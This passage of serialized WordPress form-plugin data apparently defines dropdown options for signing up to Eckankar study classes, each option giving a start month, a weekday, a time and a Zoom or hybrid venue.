Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:78:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:77:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:3;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:4;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:83:\"Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 6:45 pm - Zoom\";s:5:\"value\";s:82:\"Letters of Light and Sound 1 - STARTS IN NOVEMBER -- 1st Thursday at 645 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:5;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:82:\"Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:81:\"Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:5;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:84:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 4:00-5:30 pm - Florence-Hybrid\";s:5:\"value\";s:82:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 400-530 pm - Florence-Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:9;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:73:\"The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 7:00-8:30 pm - Zoom\";s:5:\"value\";s:71:\"The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 700-830 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:87:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 9:00 – 10:15 am - Zoom\";s:5:\"value\";s:82:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:106:\"The ECK Satsang Discourses – First Series - STARTS IN NOVEMBER -- 1st Sunday at 12:00 – 1:30 pm - Zoom\";s:5:\"value\";s:98:\"The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:12;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:109:\"The ECK Satsang Discourses – First Series - STARTS IN NOVEMBER -- 1st Sunday at 11:45 am – 1:00 pm - Zoom\";s:5:\"value\";s:101:\"The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:98:\"The ECK Satsang Discourses – Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:94:\"The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:14;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:100:\"The ECK Satsang Discourses – Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 7:00 pm - Zoom\";s:5:\"value\";s:96:\"The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:16;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:97:\"The ECK Satsang Discourses – Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 7:00 pm - Zoom\";s:5:\"value\";s:93:\"The ECK Satsang Discourses  Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:13;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:76:\"The Master 1 Discourses - STARTS IN DECEMBER -- 2nd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:75:\"The Master 1 Discourses - STARTS IN DECEMBER -- 2nd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:14;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:18;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:79:\"The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 7:30 pm - Zoom\";s:5:\"value\";s:78:\"The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:15;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:20;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:95:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 8:45 – 10:00 am - Temple-Hybrid\";s:5:\"value\";s:90:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 